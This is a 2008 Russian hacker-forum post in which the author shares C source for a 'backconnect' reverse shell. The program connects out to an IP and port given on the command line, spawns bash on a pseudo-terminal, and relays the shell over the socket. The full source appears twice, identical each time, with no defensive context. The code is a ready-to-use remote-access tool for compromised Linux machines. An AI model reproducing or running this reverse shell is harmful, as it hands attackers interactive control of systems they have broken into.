Ky3bMu4
22.03.2008, 21:41
В общем, на днях разбирался с псевдотерминальным устройством, от нечего делать написал(опять "release" от кузьмича :D ) backconnect через pty. Исходники bindshell`а от ZaCo я видел, но всё же страрался писать сам.
#include<stdio.h>
#include<stdlib.h>
#include<netinet/in.h>
#include<sys/types.h>
#include<sys/socket.h>
#include <utmp.h>
#include <termios.h>
#include <signal.h>
pid_t pty_pid;
void set_attrib(int fd){
struct termios tmp;
if(tcgetattr(fd, &tmp)<0) return;
cfmakeraw(&tmp);
tmp.c_iflag|=ICRNL|IXON|IGNCR;
tcsetattr(fd,TCSANOW,&tmp);
}
void term(int sd){
kill(pty_pid,SIGKILL);
printf("Удачи!\r\n");
kill(0,SIGKILL);
}
int main(int argc , char *argv[])
{
int sock,m_pty,s_pty,hread;
fd_set fds;
pid_t sh_pid;
struct sockaddr_in addr;
char buf[1024];
if (argc != 3)
{
printf("Use: %s ip port\n",argv[0]);
exit(0);
}
addr.sin_family = AF_INET ;
addr.sin_port = htons(atoi(argv[2]));
if (inet_aton(argv[1] , &addr.sin_addr) == 0)
{
perror("Invaild ip-address");
exit -1;
}
if ((sock = socket(PF_INET , SOCK_STREAM , 0)) < 0)
{
perror("Can`t create socket");
exit -1;
}
if((sh_pid = fork()) == -1)
{
perror("Can`t create new process");
exit -1;
}
else if (sh_pid == 0)
{
if(connect(sock , (struct sockaddr*)&addr , sizeof(addr)) == -1)
{
perror("Connection error");
exit -1;
}
openpty(&m_pty,&s_pty,0,0,0);
set_attrib(s_pty);
pty_pid=fork();
if(pty_pid==0){
close(m_pty);
login_tty(s_pty);
execlp("bash","bash",0);
exit(0);
}else if(pty_pid==-1){
perror("Cannot open pty");
exit -1;
}
signal(SIGINT,term);
signal(SIGALRM,term);
signal(SIGQUIT,term);
signal(SIGTERM,term);
close(s_pty);
for(;;)
{
FD_ZERO (&fds);
FD_SET (m_pty, &fds);
FD_SET(sock,&fds);
if(select (FD_SETSIZE, &fds, NULL, NULL, NULL) < 0) break;
if (FD_ISSET (m_pty, &fds))
{
hread=read(m_pty, buf, 1024);
if( (hread<0) || (write(sock,buf,hread)<0)) break;
}
if (FD_ISSET (sock, &fds))
{
hread=read(sock,buf,1024);
if( (hread<0) || (write(m_pty, buf, hread)<0)) break;
}
}
close(sock);
close(m_pty);
}
exit(0);
}
#include<stdio.h>
#include<stdlib.h>
#include<netinet/in.h>
#include<sys/types.h>
#include<sys/socket.h>
#include <utmp.h>
#include <termios.h>
#include <signal.h>
pid_t pty_pid;
void set_attrib(int fd){
struct termios tmp;
if(tcgetattr(fd, &tmp)<0) return;
cfmakeraw(&tmp);
tmp.c_iflag|=ICRNL|IXON|IGNCR;
tcsetattr(fd,TCSANOW,&tmp);
}
void term(int sd){
kill(pty_pid,SIGKILL);
printf("Удачи!\r\n");
kill(0,SIGKILL);
}
int main(int argc , char *argv[])
{
int sock,m_pty,s_pty,hread;
fd_set fds;
pid_t sh_pid;
struct sockaddr_in addr;
char buf[1024];
if (argc != 3)
{
printf("Use: %s ip port\n",argv[0]);
exit(0);
}
addr.sin_family = AF_INET ;
addr.sin_port = htons(atoi(argv[2]));
if (inet_aton(argv[1] , &addr.sin_addr) == 0)
{
perror("Invaild ip-address");
exit -1;
}
if ((sock = socket(PF_INET , SOCK_STREAM , 0)) < 0)
{
perror("Can`t create socket");
exit -1;
}
if((sh_pid = fork()) == -1)
{
perror("Can`t create new process");
exit -1;
}
else if (sh_pid == 0)
{
if(connect(sock , (struct sockaddr*)&addr , sizeof(addr)) == -1)
{
perror("Connection error");
exit -1;
}
openpty(&m_pty,&s_pty,0,0,0);
set_attrib(s_pty);
pty_pid=fork();
if(pty_pid==0){
close(m_pty);
login_tty(s_pty);
execlp("bash","bash",0);
exit(0);
}else if(pty_pid==-1){
perror("Cannot open pty");
exit -1;
}
signal(SIGINT,term);
signal(SIGALRM,term);
signal(SIGQUIT,term);
signal(SIGTERM,term);
close(s_pty);
for(;;)
{
FD_ZERO (&fds);
FD_SET (m_pty, &fds);
FD_SET(sock,&fds);
if(select (FD_SETSIZE, &fds, NULL, NULL, NULL) < 0) break;
if (FD_ISSET (m_pty, &fds))
{
hread=read(m_pty, buf, 1024);
if( (hread<0) || (write(sock,buf,hread)<0)) break;
}
if (FD_ISSET (sock, &fds))
{
hread=read(sock,buf,1024);
if( (hread<0) || (write(m_pty, buf, hread)<0)) break;
}
}
close(sock);
close(m_pty);
}
exit(0);
}